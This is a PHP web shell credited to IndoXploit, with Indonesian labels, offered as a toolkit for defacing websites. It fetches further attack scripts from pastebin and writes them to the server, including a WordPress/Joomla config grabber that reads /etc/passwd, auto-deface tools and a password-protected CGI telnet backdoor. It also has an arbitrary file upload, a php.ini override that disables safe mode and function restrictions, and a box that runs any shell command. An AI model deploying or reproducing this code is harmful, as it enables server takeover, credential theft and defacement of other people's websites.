gabungan tools

<?php
// Tu5b0l3d - IndoXploit
// thx for you.
// http://indoxploit.blogspot.co.id/2016/01/simple-tools-for-deface.html

function parah($pastebin, $nama_file){
    $usa = file_get_contents("$pastebin");
    $frr = fopen("$nama_file", 'w');
    fwrite($frr, $usa);
}
$xp = $_GET[xp];
$b = "Ini merupakan beberapa tool untuk mempermudah dalam hal mendeface ataupun yang lainnya.<br><br>#<br>Tu5b0l3d - IndoXploit";
if($xp == "config_grabber_wp_jm"){
    $config = parah("http://pastebin.com/raw.php?i=deH5eAqP", "config_wp_jm_grabber.php");

        $b = '<h2><a href="config_wp_jm_grabber.php" target="_blank">Config Grabber Wordpress dan joomla</a></h2><br>
        tool ini pertama ambil user dari /etc/passwd, kemudian cek apakah user Readable atau tidak, jika readable Maka akan diambil confignya';

}
elseif($xp == "just_jumping"){
    $jump = parah("http://pastebin.com/raw.php?i=eewrEsJY", "just_jumping.php");

        $b = '<h2><a href="just_jumping.php" target="_blank">Just Jumping</a></h2><br>
        tool jumping ini cuma melihat apakah user readable atau tidak menggunakan fungsi is_readable, jika readable, maka ditampilkan, <br>dan juga nama domainnya akan ditampilkan untuk mempermudah memakai tools yang lainnya.';

    }
    elseif($xp == "pepes_joomla"){
    $pepes_joomla = parah("http://pastebin.com/raw.php?i=50NQdet2", "pepes_joomla.php");

        $b = '<h2><a href="pepes_joomla.php" target="_blank">Auto Deface site cms Joomla</a></h2><br>
        tool ini bisa untuk auto deface jika ente tau nama sitenya, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
        video: <a href="https://youtu.be/clvLy5pDA2I" target="_blank">tonton</a>';

    }
    elseif($xp == "pepes_wp"){
        $pepes_wp = parah("http://pastebin.com/raw.php?i=uQWCGPMS", "pepes_wp.php");

        $b = '<h2><a href="pepes_wp.php" target="_blank">Auto Deface site cms Wordpress</a></h2><br>
        tool ini bisa untuk auto deface site berCMS Wordpress, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
        video: <a href="https://youtu.be/tWEcMuiqKlo" target="_blank">tonton</a>';

    }
    elseif($xp == "pepes_wp2"){
    $pepes_wp2 = parah("http://pastebin.com/raw.php?i=4rZfJaqE", "pepes_wp2.php");

        $b = '<h2><a href="pepes_wp2.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
        Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';

    }

    elseif($xp == "link_title"){
    $link_title = parah("http://pastebin.com/raw.php?i=u69dMjH9", "link_title.php");

        $b = '<h2><a href="link_title.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
        Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';

    }

    elseif($xp == "cgi"){
    $dir = mkdir('cgi', 0777);
    $cgi = parah("http://pastebin.com/raw.php?i=XTUFfJLg", "cgi/anu.izo");

                $acces = "AddHandler cgi-script .izo";
                $frr2 = fopen('cgi/.htaccess', 'w');
                fwrite($frr2, $acces);
                chmod("cgi/anu.izo", 0755);


        $b = '<h2><a href="cgi/anu.izo" target="_blank">CGI Telnet</a></h2><br>
        password = indoXploit<br>it\' powerfull, source: <a href="http://www.rohitab.com/cgi-telnet" target="_blank">Rohitab.com</a>';

    }
    elseif($xp == "upload"){
    if($_POST['v']){
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
$b = "<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
$b = "<b>gagal</b>";
}
}
else{
    $b = "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
}


    }
    elseif($xp == "bypass"){
    $dir = getcwd();
    $isi = 'safe_mode = off
disable_functions = NONE
';
$buka = fopen($dir.'/php.ini', 'w');
fwrite($buka, $isi);

        $b = '<h2><a href="php.ini" target="_blank">Bypass Disabled Functions</a></h2><br>
        klik link tsb.';

    }


    elseif($xp == "command"){
session_start();
if(empty($_SESSION["dir"]))$_SESSION["dir"]="./";

$a = '<textarea rows="10" cols="100">';
if(isset($_POST['command'])){
isset($_SESSION["dir"])?chdir($_SESSION["dir"]):null;
$cmd=trim($_POST['command']);
if(preg_match("/^cd\s/i",$cmd)){
$pecah=explode(" ",preg_replace("/\s+/"," ",$cmd));
if(@chdir($pecah[1])){
$n="directory changed to $pecah[1]";
$_SESSION["dir"].=$pecah[1]."/";
}
else $n="error cd";
}else $n=shell_exec($_POST['command']);
}else $n='';
$c = "</textarea>";
$b = $a.$n.$c;
    }
    echo '<!DOCTYPE html>
<html>
<head>
    <title>IndoXploit</title>

    <style>
        a{
            text-decoration: none;
        }
        a:hover{
            color: red;
        }
        .kotak{
            border: 1px solid grey;
            width: 200px;
            height: 20px;
            text-align: center;
            border-radius: 3px;
            float: left;
            margin-right: 5px;
        }
        .kotak:hover{
            border: 1px solid red;

        }
        #com{
            margin-right: 70px;
            float: left;
        }

    </style>
</head>
<body>
    <center><h2>Simple Tools by Indo<font color="red">}{</font>ploit</h2></center><hr>
    <div class="kotak"><a href="?xp=just_jumping">Just Jumping</a></div>
    <div class="kotak"><a href="?xp=config_grabber_wp_jm">Config Grabber WP dan Joomla</a></div>
    <div class="kotak"><a href="?xp=pepes_joomla">Auto Deface site cms joomla</a></div>
    <div class="kotak"><a href="?xp=pepes_wp">Auto Deface site Wordpress</a></div>
    <div class="kotak"><a href="?xp=pepes_wp2">Auto Deface site Wordpress 2</a></div>
    <div class="kotak"><a href="?xp=link_title">Title site Wordpress</a></div>

    ';

    echo "<br><br><br>$b<br><br><br><br><hr>
</body>
</html>";
if(@ini_get("disable_functions")){
 echo "Disabled Functions = <font color='red'>".@ini_get("disable_functions")."</font>";
}else{
 echo "Disable Functions = None";
}

 if(@ini_get("safe_mode")){echo "<br><br>Safe Mode = <font color='red'>ON<br><br>";}else{ echo "<br><br>Safe Mode = OFF<br><br>";}
 $kernel = shell_exec("uname -a");
 echo "Kernel: <font color='red'>$kernel<br><br>";
 echo '<div class="kotak"><a href="?xp=bypass">Bypass disabled Functions</a></div> <div class="kotak"><a href="?xp=cgi">CGI Telnet</a></div><div class="kotak"><a href="?xp=upload">Upload File</a></div><br><br>';
 echo '<div id="com"><form method="post" action="?xp=command"><input type="text" name="command" placeholder="Command"><input type="submit" value="Go!"></div>';


?>